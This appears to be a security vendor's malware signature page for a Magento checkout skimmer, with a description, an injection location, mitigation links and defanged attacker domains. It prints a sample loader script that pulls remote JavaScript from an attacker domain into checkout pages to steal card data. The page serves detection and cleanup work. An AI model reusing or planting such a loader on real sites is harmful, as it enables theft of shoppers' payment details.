SiteCheck Signatures

  1. Home
  2. SiteCheck Signatures
  3. malware.magento_shoplift.38.1

malware.magento_shoplift.38.1

Description: Injection of malicious scripts into Magneto checkout pages. The scripts steal entered payment details and send them to remote third-party sites.

The scripts are typically injected into the core_config_data table

Sample:

<scri pt type="text/javascript">var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true;
po.src = '//mcloudjs[.]com/ext/htc.css?cloud=23555534255262'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s);</script>

Domain involed: googieapls[.]com, mcloudjs[.]com

For additional details check the Ecommerce security category of our blog.

Affecting: Magento

Mitigation How to clean a hacked Magento site